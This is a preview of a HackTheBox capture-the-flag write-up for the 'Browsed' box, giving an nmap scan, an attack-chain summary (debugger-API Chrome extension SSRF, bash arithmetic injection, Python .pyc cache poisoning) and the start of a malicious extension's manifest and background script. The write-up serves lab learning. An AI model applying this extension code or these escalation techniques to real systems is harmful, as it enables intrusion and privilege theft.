webfreehard

Browsed

hackthebox

Task: Full box exploitation of a website that processes Chrome extensions in headless browser. Solution: Upload malicious extension using chrome.debugger API for SSRF, exploit bash arithmetic evaluation injection ([[ $var -eq 0 ]]) for RCE as user, then poison Python .pyc cache with matching timestamp/size in world-writable __pycache__ for root privilege escalation.

$ ls tags/ techniques/

flask ssrf bash_arithmetic_injection privilege_escalation chrome_extension debugger_api pyc_cache_poisoning gitea headless_chrome

malicious_extension_uploadchrome_debugger_ssrfbash_eq_injectionpython_bytecode_poisoningtimestamp_bypass

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

Browsed - HackTheBox

Overview

Target: 10.129.2.1
Services: SSH (22), HTTP (80) - nginx/1.24.0 Ubuntu
Difficulty: Hard
Attack Chain: Chrome Extension Exploitation -> Bash Arithmetic Injection -> Python .pyc Cache Poisoning

This box demonstrates a sophisticated multi-stage attack involving browser extension abuse, bash arithmetic evaluation vulnerabilities, and Python bytecode cache poisoning for privilege escalation.

Phase 1: Initial Reconnaissance

Service Enumeration

nmap -sC -sV -p- 10.129.2.1

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu
80/tcp open  http    nginx/1.24.0 (Ubuntu)

Web Application Analysis

The website browsed.htb belongs to a company that develops browser extensions. Key discovery:

Upload endpoint: /upload.php accepts Chrome extensions in .zip format
Uploaded extensions are executed in a headless Chrome environment
The headless browser visits:
- http://localhost/
- http://browsedinternals.htb

Phase 2: Initial Access via Malicious Chrome Extension

Understanding the Attack Vector

Chrome extensions with debugger API permissions can:

Attach to any tab
Read local files via file:// protocol
Access internal services (SSRF)

Creating the Malicious Extension

manifest.json:

{
  "manifest_version": 3,
  "name": "Security Test Extension",
  "version": "1.0",
  "permissions": [
    "debugger",
    "tabs",
    "activeTab"
  ],
  "host_permissions": [
    "<all_urls>",
    "file://*/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"]
  }]
}

background.js:

// Service worker for malicious extension
chrome.runtime.onInstalled.addListener(async () => {
  console.log("Extension installed, starting reconnaissance...");
  
  // Wait for tabs to be available
  setTimeout(async () => {
    try {
      // Get all tabs
      const tabs = await chrome.tabs.query({});
      
      for (const tab of tabs) {
        // Attach debugger to each tab
        await attachAndExploit(tab);
      }
    } catch (e) {
      console.error("Error:", e);
    }
  }, 2000);
});

...

$ grep --similar

Similar writeups

[web][free]Conversor (Full Box)— hackthebox
[pentest][free]Interpreter (Mirth Connect → f-string Injection)— hackthebox
[web][free]OmniWatch (session replay)— HackTheBox
[web][free]Facts— hackthebox
[forensics][free]TrueSecrets— hackthebox